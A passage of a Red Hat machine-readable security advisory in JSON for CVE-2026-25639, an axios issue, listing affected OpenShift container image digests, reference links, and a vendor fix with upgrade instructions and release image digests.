"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T17:02:30+00:00",
"details": "For OpenShift Container Platform 4.20 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.20/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:e0e62ca0bf43f7e9c18551fb8907c882c60cfa0c76392d3a8115a628da02d693\n\n (For s390x architecture)\n The image digest is sha256:d468783ef1d0d6ca66d14856d0ea8615deba9c87b6e8638996fe31170c3b93da\n\n (For ppc64le architecture)\n The image digest is sha256:cec4ff75a5cd9304b5ba95abd858cd9483934c55d1d2ea34623d1685ad9795e2\n\n (For aarch64 architecture)\n The image digest is sha256:4a3cdf5cb6ea8ab473307a61ad8599b92f710f142da2a60ff5c26d3571d85a25\n\nAll OpenShift Container Platform 4.20 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.20/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5142"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
